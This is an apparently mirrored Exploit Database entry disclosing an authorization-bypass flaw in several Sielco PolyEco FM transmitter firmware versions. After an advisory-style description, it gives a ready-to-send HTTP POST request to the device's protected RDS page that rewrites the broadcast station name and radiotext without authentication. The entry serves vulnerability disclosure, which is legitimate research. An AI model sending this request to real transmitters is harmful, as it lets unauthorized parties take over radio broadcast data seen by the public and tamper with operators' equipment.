Sielco PolyEco Digital FM Transmitter 2.0.6 – Radio Data System POST Manipulation

• Exploit Database
• 14 阅读

• 作者： LiquidWorm
  日期： 2023-04-14
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/51369/

• ## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Radio Data System POST Manipulation
  ## Exploit Author: LiquidWorm
  
  
  Vendor: Sielco S.r.l
  Product web page: https://www.sielco.org
  Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19
  PolyEco1000 CPU:1.9.4 FPGA:10.19
  PolyEco1000 CPU:1.9.3 FPGA:10.19
  PolyEco500 CPU:1.7.0 FPGA:10.16
  PolyEco300 CPU:2.0.2 FPGA:10.19
  PolyEco300 CPU:2.0.0 FPGA:10.19
  
  Summary: PolyEco is the innovative family of high-end digital
  FM transmitters of Sielco. They are especially suited as high
  performance power system exciters or compact low-mid power
  transmitters. The same cabinet may in fact be fitted with 50,
  100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500,
  1000).
  
  All features can be controlled via the large touch-screen display
  4.3" or remotely. Many advanced features are inside by default
  in the basic version such as: stereo and RDS encoder, audio
  change-over, remote-control via LAN and SNMP, "FFT" spectral
  analysis of the audio sources, SFN synchronization and much more.
  
  Desc: Improper access control occurs when the application provides
  direct access to objects based on user-supplied input. As a result
  of this vulnerability attackers can bypass authorization and access
  resources behind protected pages. The application interface allows
  users to perform certain actions via HTTP requests without performing
  any validity checks to verify the requests. This can be exploited
  to perform certain actions and manipulate the RDS text display.
  
  Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  Macedonian Information Security Research and Development Laboratory
  Zero Science Lab - https://www.zeroscience.mk - @zeroscience
  
  
  Advisory ID: ZSL-2023-5767
  Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5767.php
  
  
  26.01.2023
  
  --
  
  
  POST /protect/rds.htm HTTP/1.1
  Host: RADIOFM
  
  rds_inta=1
  rds_intb=0
  rds_pi=381
  rds_ps=ZSL
  rds_rta=www.zeroscience.mk
  rds_rtb
  rds_rtt=0
  rds_tp=0
  rds_tp=1
  rds_ta=0
  rds_ms=0
  rds_pty=4
  rds_ptyn=
  rds_ecc=00
  rds_ct=0
  rds_level=90
  rds_psd=0
  rds_psd1
  rds_pst1=0
  rds_psd5
  rds_pst5=0
  rds_psd2
  rds_pst2=0
  rds_psd6
  rds_pst6=0
  rds_psd3
  rds_pst3=0
  rds_psd7
  rds_pst7=0
  rds_psd4
  rds_pst4=0
  rds_psd8
  rds_pst8=0
  rds_di_pty=0
  rds_di_cmp=0
  rds_di_cmp=1
  rds_di_st=0
  rds_di_art=0
  rds_di_art=1
  a0=90
  a1=9
  a2=26
  a3=115
  a4=0
  a5=0
  a6=0
  a7=0
  a8=0
  a9=0
  a10=0
  a11=0
  a12=0
  a13=0
  a14=0
  a15=0
  a16=0
  a17=0
  a18=0
  a19=0
  a20=0
  a21=0
  a22=0
  a23=0
  a24=0